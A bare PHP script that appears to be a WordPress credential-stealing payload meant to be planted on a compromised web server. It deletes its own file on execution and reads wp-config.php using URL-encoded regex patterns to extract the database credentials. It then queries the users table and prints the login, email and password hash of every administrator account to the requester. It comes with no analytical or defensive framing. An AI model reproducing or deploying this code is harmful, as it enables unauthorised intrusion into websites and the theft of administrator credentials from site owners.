<?php unlink(__FILE__); function GetDocRoot()
{
    $docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $_SERVER['REQUEST_URI']);
    if ($docroot_end === FALSE)
    {
        return $_SERVER['DOCUMENT_ROOT'];
    }
    elseif ($docroot_end === 0)
    {
        return "/";
    }
    else
    {
        return substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
    }
}


function parse_wp($cont)
{
    $db_name = NULL;
    $db_user = NULL;
    $db_pass = NULL;
    $db_host = NULL;

    preg_match_all(rawurldecode('%2F%28define%5C%28%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%28%5C%27%2C%5Cs%2A%5C%27%29%28%5B%5E%5C%27%5D%2B%29%2F'), $cont, $matches);
    if (is_array($matches)) {
        for ($i = 0; $i < count($matches[2]); $i++) {
            if (stristr($matches[2][$i], "DB_NAME")) {
                $db_name = $matches[4][$i];
            } elseif (stristr($matches[2][$i], "db_user")) {
                $db_user = $matches[4][$i];
            } elseif (stristr($matches[2][$i], "db_password")) {
                $db_pass = $matches[4][$i];
            } elseif (stristr($matches[2][$i], "db_host")) {
                $db_host = $matches[4][$i];
            }
        }

        preg_match_all(rawurldecode("%2Ftable_prefix%5Cs%2A%3D%5Cs%2A%5B%27%22%5D%28.%2A%29%5B%27%22%5D%3B%2F"), $cont, $matches);

        if (is_array($matches))
        {
            $db_prefix = $matches[1][0];
        }

        if (!empty($db_name)) {

            if (strpos($db_host, ":") !== FALSE)
            {
                $host_port = explode(":", $db_host);
                $host = $host_port[0];
                $port = intval($host_port[1]);
            }
            else
            {
                $host = $db_host;
                $port = 3306;
            }

            if ($conn = mysqli_connect($host, $db_user, $db_pass, $db_name, $port)) {

                $result = mysqli_query($conn, "SELECT user_login, user_email, user_status, user_pass, ID FROM " . $db_prefix . "users;");

                $results = Array();
                while (($temp = mysqli_fetch_array($result)))
                {
                    $results[] = $temp;
                }

                foreach ($results as $item)
                {
                    $q = "SELECT meta_value FROM ". $db_prefix . "usermeta WHERE user_id=" . $item[4] . " AND meta_value LIKE '%administrator%';";

                    $result2 = mysqli_query($conn, $q);

                    if (empty(mysqli_fetch_array($result2, MYSQLI_NUM)))
                    {
                        continue;
                    }
                    echo "USER!!!\t" . str_replace("www.", "", $_SERVER['HTTP_HOST']) . "\t" . $item[0] . "\t" . $item[1] . "\t" . $item[2] . "\t" . $item[3] . PHP_EOL;
                }

                mysqli_close($conn);
                return TRUE;
            }
        }
    }
    return FALSE;
}

$data = @file_get_contents(GetDocRoot() . "/wp-config.php");

if (!empty($data))
{
    parse_wp($data);
}

